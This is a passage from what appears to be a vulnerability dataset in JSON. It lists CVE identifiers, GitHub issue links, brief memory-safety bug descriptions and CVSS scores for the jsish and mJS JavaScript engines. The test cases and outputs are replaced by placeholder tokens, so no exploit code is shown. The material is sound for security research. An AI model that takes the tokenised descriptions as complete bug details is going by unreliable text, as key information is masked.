  77431. "CVE_ID": "CVE-2021-46496",
  77432. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/83",
  77433. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/83",
  77434. "Repo_new": "pcmacdon/jsish",
  77435. "Issue_Created_At": "2021-12-24T10:49:33Z",
  77436. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77437. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77438. "severity": "MEDIUM",
  77439. "baseScore": 5.5,
  77440. "impactScore": 3.6,
  77441. "exploitabilityScore": 1.8
  77442. },
  77443. {
  77444. "CVE_ID": "CVE-2021-46497",
  77445. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/84",
  77446. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/84",
  77447. "Repo_new": "pcmacdon/jsish",
  77448. "Issue_Created_At": "2021-12-24T10:50:28Z",
  77449. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG Execution steps & Output ERRORTAG",
  77450. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77451. "severity": "MEDIUM",
  77452. "baseScore": 5.5,
  77453. "impactScore": 3.6,
  77454. "exploitabilityScore": 1.8
  77455. },
  77456. {
  77457. "CVE_ID": "CVE-2021-46498",
  77458. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/81",
  77459. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/81",
  77460. "Repo_new": "pcmacdon/jsish",
  77461. "Issue_Created_At": "2021-12-24T10:48:23Z",
  77462. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77463. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77464. "severity": "MEDIUM",
  77465. "baseScore": 5.5,
  77466. "impactScore": 3.6,
  77467. "exploitabilityScore": 1.8
  77468. },
  77469. {
  77470. "CVE_ID": "CVE-2021-46499",
  77471. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/76",
  77472. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/76",
  77473. "Repo_new": "pcmacdon/jsish",
  77474. "Issue_Created_At": "2021-12-24T10:44:21Z",
  77475. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77476. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77477. "severity": "MEDIUM",
  77478. "baseScore": 5.5,
  77479. "impactScore": 3.6,
  77480. "exploitabilityScore": 1.8
  77481. },
  77482. {
  77483. "CVE_ID": "CVE-2021-46500",
  77484. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/85",
  77485. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/85",
  77486. "Repo_new": "pcmacdon/jsish",
  77487. "Issue_Created_At": "2021-12-24T10:51:56Z",
  77488. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77489. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77490. "severity": "MEDIUM",
  77491. "baseScore": 5.5,
  77492. "impactScore": 3.6,
  77493. "exploitabilityScore": 1.8
  77494. },
  77495. {
  77496. "CVE_ID": "CVE-2021-46501",
  77497. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/86",
  77498. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/86",
  77499. "Repo_new": "pcmacdon/jsish",
  77500. "Issue_Created_At": "2021-12-24T10:52:55Z",
  77501. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77502. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77503. "severity": "MEDIUM",
  77504. "baseScore": 5.5,
  77505. "impactScore": 3.6,
  77506. "exploitabilityScore": 1.8
  77507. },
  77508. {
  77509. "CVE_ID": "CVE-2021-46502",
  77510. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/87",
  77511. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/87",
  77512. "Repo_new": "pcmacdon/jsish",
  77513. "Issue_Created_At": "2021-12-24T10:53:39Z",
  77514. "description": "Heap use after free ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77515. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77516. "severity": "MEDIUM",
  77517. "baseScore": 5.5,
  77518. "impactScore": 3.6,
  77519. "exploitabilityScore": 1.8
  77520. },
  77521. {
  77522. "CVE_ID": "CVE-2021-46503",
  77523. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/88",
  77524. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/88",
  77525. "Repo_new": "pcmacdon/jsish",
  77526. "Issue_Created_At": "2021-12-24T10:54:21Z",
  77527. "description": "Heap use after free ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77528. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77529. "severity": "MEDIUM",
  77530. "baseScore": 5.5,
  77531. "impactScore": 3.6,
  77532. "exploitabilityScore": 1.8
  77533. },
  77534. {
  77535. "CVE_ID": "CVE-2021-46504",
  77536. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/51",
  77537. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/51",
  77538. "Repo_new": "pcmacdon/jsish",
  77539. "Issue_Created_At": "2021-12-24T09:40:19Z",
  77540. "description": "Assertion `vp != APITAG failed at APITAG APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output APITAG",
  77541. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77542. "severity": "MEDIUM",
  77543. "baseScore": 5.5,
  77544. "impactScore": 3.6,
  77545. "exploitabilityScore": 1.8
  77546. },
  77547. {
  77548. "CVE_ID": "CVE-2021-46505",
  77549. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/53",
  77550. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/53",
  77551. "Repo_new": "pcmacdon/jsish",
  77552. "Issue_Created_At": "2021-12-24T09:43:02Z",
  77553. "description": "Stack overflow in ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77554. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77555. "severity": "MEDIUM",
  77556. "baseScore": 5.5,
  77557. "impactScore": 3.6,
  77558. "exploitabilityScore": 1.8
  77559. },
  77560. {
  77561. "CVE_ID": "CVE-2021-46506",
  77562. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/52",
  77563. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/52",
  77564. "Repo_new": "pcmacdon/jsish",
  77565. "Issue_Created_At": "2021-12-24T09:41:38Z",
  77566. "description": "Assertion `v >d.lval != v' failed at APITAG APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output ERRORTAG",
  77567. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77568. "severity": "MEDIUM",
  77569. "baseScore": 5.5,
  77570. "impactScore": 3.6,
  77571. "exploitabilityScore": 1.8
  77572. },
  77573. {
  77574. "CVE_ID": "CVE-2021-46507",
  77575. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/54",
  77576. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/54",
  77577. "Repo_new": "pcmacdon/jsish",
  77578. "Issue_Created_At": "2021-12-24T09:43:48Z",
  77579. "description": "Stack overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG Test case2 ERRORTAG Execution steps & Output ERRORTAG",
  77580. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77581. "severity": "MEDIUM",
  77582. "baseScore": 5.5,
  77583. "impactScore": 3.6,
  77584. "exploitabilityScore": 1.8
  77585. },
  77586. {
  77587. "CVE_ID": "CVE-2021-46508",
  77588. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/188",
  77589. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/188",
  77590. "Repo_new": "cesanta/mjs",
  77591. "Issue_Created_At": "2021-12-31T05:23:32Z",
  77592. "description": "Assertion `i < parts_cnt' failed at APITAG struct mjs_bcode_part APITAG mjs , size_t).. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG Execution steps & Output CODETAG",
  77593. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77594. "severity": "MEDIUM",
  77595. "baseScore": 5.5,
  77596. "impactScore": 3.6,
  77597. "exploitabilityScore": 1.8
  77598. },
  77599. {
  77600. "CVE_ID": "CVE-2021-46509",
  77601. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/200",
  77602. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/200",
  77603. "Repo_new": "cesanta/mjs",
  77604. "Issue_Created_At": "2021-12-31T05:43:04Z",
  77605. "description": "Stack overflow PATHTAG in snquote. mJS revision Commit: b1b6eac URLTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77606. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77607. "severity": "HIGH",
  77608. "baseScore": 7.8,
  77609. "impactScore": 5.9,
  77610. "exploitabilityScore": 1.8
  77611. },
  77612. {
  77613. "CVE_ID": "CVE-2021-46510",
  77614. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/185",
  77615. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/185",
  77616. "Repo_new": "cesanta/mjs",
  77617. "Issue_Created_At": "2021-12-31T05:20:39Z",
  77618. "description": "Assertion `s < mjs >owned_strings.buf + mjs APITAG failed APITAG gc_mark_string.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
  77619. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77620. "severity": "MEDIUM",
  77621. "baseScore": 5.5,
  77622. "impactScore": 3.6,
  77623. "exploitabilityScore": 1.8
  77624. },
  77625. {
  77626. "CVE_ID": "CVE-2021-46511",
  77627. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/183",
  77628. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/183",
  77629. "Repo_new": "cesanta/mjs",
  77630. "Issue_Created_At": "2021-12-31T05:18:57Z",
  77631. "description": "Assertion `m >len >= sizeof(v)' failed at APITAG mjs_pop_val . mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output APITAG",
  77632. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77633. "severity": "MEDIUM",
  77634. "baseScore": 5.5,
  77635. "impactScore": 3.6,
  77636. "exploitabilityScore": 1.8
  77637. },
  77638. {
  77639. "CVE_ID": "CVE-2021-46512",
  77640. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/202",
  77641. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/202",
  77642. "Repo_new": "cesanta/mjs",
  77643. "Issue_Created_At": "2021-12-31T07:29:20Z",
  77644. "description": "SEGV APITAG in mjs_apply. mJS revision Commit: b1b6eac URLTAG Version: Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77645. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77646. "severity": "MEDIUM",
  77647. "baseScore": 5.5,
  77648. "impactScore": 3.6,
  77649. "exploitabilityScore": 1.8
  77650. },
  77651. {
  77652. "CVE_ID": "CVE-2021-46513",
  77653. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/189",
  77654. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/189",
  77655. "Repo_new": "cesanta/mjs",
  77656. "Issue_Created_At": "2021-12-31T05:24:24Z",
  77657. "description": "Global buffer overflow PATHTAG in mjs_mk_string. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77658. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77659. "severity": "HIGH",
  77660. "baseScore": 7.8,
  77661. "impactScore": 5.9,
  77662. "exploitabilityScore": 1.8
  77663. },
  77664. {
  77665. "CVE_ID": "CVE-2021-46514",
  77666. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/187",
  77667. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/187",
  77668. "Repo_new": "cesanta/mjs",
  77669. "Issue_Created_At": "2021-12-31T05:22:41Z",
  77670. "description": "Assertion `ppos != NULL && mjs_is_number( ppos)' failed at APITAG int mjs_getretvalpos(struct mjs ).. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
  77671. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77672. "severity": "MEDIUM",
  77673. "baseScore": 5.5,
  77674. "impactScore": 3.6,
  77675. "exploitabilityScore": 1.8
  77676. },
  77677. {
  77678. "CVE_ID": "CVE-2021-46515",
  77679. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/186",
  77680. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/186",
  77681. "Repo_new": "cesanta/mjs",
  77682. "Issue_Created_At": "2021-12-31T05:21:24Z",
  77683. "description": "Assertion `mjs_stack_size(&mjs >scopes) >= scopes_len' failed at APITAG mjs_execute.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG Execution steps & Output CODETAG",
  77684. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77685. "severity": "MEDIUM",
  77686. "baseScore": 5.5,
  77687. "impactScore": 3.6,
  77688. "exploitabilityScore": 1.8
  77689. },
  77690. {
  77691. "CVE_ID": "CVE-2021-46516",
  77692. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/201",
  77693. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/201",
  77694. "Repo_new": "cesanta/mjs",
  77695. "Issue_Created_At": "2021-12-31T07:26:25Z",
  77696. "description": "SEGV PATHTAG in mjs_stack_size. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77697. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77698. "severity": "MEDIUM",
  77699. "baseScore": 5.5,
  77700. "impactScore": 3.6,
  77701. "exploitabilityScore": 1.8
  77702. },
  77703. {
  77704. "CVE_ID": "CVE-2021-46517",
  77705. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/184",
  77706. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/184",
  77707. "Repo_new": "cesanta/mjs",
  77708. "Issue_Created_At": "2021-12-31T05:19:48Z",
  77709. "description": "Assertion `mjs_stack_size(&mjs >scopes NUMBERTAG failed APITAG mjs_execute.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
  77710. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77711. "severity": "MEDIUM",
  77712. "baseScore": 5.5,
  77713. "impactScore": 3.6,
  77714. "exploitabilityScore": 1.8
  77715. },
  77716. {
  77717. "CVE_ID": "CVE-2021-46518",
  77718. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/195",
  77719. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/195",
  77720. "Repo_new": "cesanta/mjs",
  77721. "Issue_Created_At": "2021-12-31T05:37:12Z",
  77722. "description": "Heap buffer overflow APITAG in mjs_disown. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77723. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77724. "severity": "HIGH",
  77725. "baseScore": 7.8,
  77726. "impactScore": 5.9,
  77727. "exploitabilityScore": 1.8
  77728. },
  77729. {
  77730. "CVE_ID": "CVE-2021-46519",
  77731. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/194",
  77732. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/194",
  77733. "Repo_new": "cesanta/mjs",
  77734. "Issue_Created_At": "2021-12-31T05:36:16Z",
  77735. "description": "Heap buffer overflow APITAG in mjs_array_length. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77736. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77737. "severity": "HIGH",
  77738. "baseScore": 7.8,
  77739. "impactScore": 5.9,
  77740. "exploitabilityScore": 1.8
  77741. },
  77742. {
  77743. "CVE_ID": "CVE-2021-46520",
  77744. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/193",
  77745. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/193",
  77746. "Repo_new": "cesanta/mjs",
  77747. "Issue_Created_At": "2021-12-31T05:35:03Z",
  77748. "description": "Heap buffer overflow APITAG in mjs_jprintf. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77749. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77750. "severity": "HIGH",
  77751. "baseScore": 7.8,
  77752. "impactScore": 5.9,
  77753. "exploitabilityScore": 1.8
  77754. },
  77755. {
  77756. "CVE_ID": "CVE-2021-46521",
  77757. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/190",
  77758. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/190",
  77759. "Repo_new": "cesanta/mjs",
  77760. "Issue_Created_At": "2021-12-31T05:25:14Z",
  77761. "description": "Global buffer overflow PATHTAG in mjs_mk_string. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77762. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77763. "severity": "HIGH",
  77764. "baseScore": 7.8,
  77765. "impactScore": 5.9,
  77766. "exploitabilityScore": 1.8
  77767. },
  77768. {
  77769. "CVE_ID": "CVE-2021-46522",
  77770. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/196",
  77771. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/196",
  77772. "Repo_new": "cesanta/mjs",
  77773. "Issue_Created_At": "2021-12-31T05:38:16Z",
  77774. "description": "Heap buffer overflow ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77775. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77776. "severity": "HIGH",
  77777. "baseScore": 7.8,
  77778. "impactScore": 5.9,
  77779. "exploitabilityScore": 1.8
  77780. },
  77781. {
  77782. "CVE_ID": "CVE-2021-46523",
  77783. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/198",
  77784. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/198",
  77785. "Repo_new": "cesanta/mjs",
  77786. "Issue_Created_At": "2021-12-31T05:40:39Z",
  77787. "description": "Heap buffer overflow PATHTAG in to_json_or_debug. mJS revision Commit: b1b6eac URLTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77788. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77789. "severity": "HIGH",
  77790. "baseScore": 7.8,
  77791. "impactScore": 5.9,
  77792. "exploitabilityScore": 1.8
  77793. },
  77794. {
  77795. "CVE_ID": "CVE-2021-46524",
  77796. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/192",
  77797. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/192",
  77798. "Repo_new": "cesanta/mjs",
  77799. "Issue_Created_At": "2021-12-31T05:33:31Z",
  77800. "description": "Heap buffer overflow APITAG in snquote. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77801. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77802. "severity": "HIGH",
  77803. "baseScore": 7.8,
  77804. "impactScore": 5.9,
  77805. "exploitabilityScore": 1.8
  77806. },
  77807. {
  77808. "CVE_ID": "CVE-2021-46525",
  77809. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/199",
  77810. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/199",
  77811. "Repo_new": "cesanta/mjs",
  77812. "Issue_Created_At": "2021-12-31T05:41:58Z",
  77813. "description": "Heap use after free APITAG in mjs_apply. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77814. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77815. "severity": "HIGH",
  77816. "baseScore": 7.8,
  77817. "impactScore": 5.9,
  77818. "exploitabilityScore": 1.8
  77819. },
  77820. {
  77821. "CVE_ID": "CVE-2021-46526",
  77822. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/191",
  77823. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/191",
  77824. "Repo_new": "cesanta/mjs",
  77825. "Issue_Created_At": "2021-12-31T05:31:36Z",
  77826. "description": "Global buffer overflow APITAG in snquote. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77827. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77828. "severity": "HIGH",
  77829. "baseScore": 7.8,
  77830. "impactScore": 5.9,
  77831. "exploitabilityScore": 1.8
  77832. },
  77833. {
  77834. "CVE_ID": "CVE-2021-46527",
  77835. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/197",
  77836. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/197",
  77837. "Repo_new": "cesanta/mjs",
  77838. "Issue_Created_At": "2021-12-31T05:39:31Z",
  77839. "description": "Heap buffer overflow APITAG in mjs_get_cstring. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77840. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77841. "severity": "HIGH",
  77842. "baseScore": 7.8,
  77843. "impactScore": 5.9,
  77844. "exploitabilityScore": 1.8
  77845. },
  77846. {
  77847. "CVE_ID": "CVE-2021-46528",
  77848. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/208",
  77849. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/208",
  77850. "Repo_new": "cesanta/mjs",
  77851. "Issue_Created_At": "2021-12-31T07:44:06Z",
  77852. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77853. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77854. "severity": "MEDIUM",
  77855. "baseScore": 5.5,
  77856. "impactScore": 3.6,
  77857. "exploitabilityScore": 1.8
  77858. },
  77859. {
  77860. "CVE_ID": "CVE-2021-46529",
  77861. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/210",
  77862. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/210",
  77863. "Repo_new": "cesanta/mjs",
  77864. "Issue_Created_At": "2021-12-31T07:46:17Z",
  77865. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77866. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77867. "severity": "MEDIUM",
  77868. "baseScore": 5.5,
  77869. "impactScore": 3.6,
  77870. "exploitabilityScore": 1.8
  77871. },
  77872. {
  77873. "CVE_ID": "CVE-2021-46530",
  77874. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/206",
  77875. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/206",
  77876. "Repo_new": "cesanta/mjs",
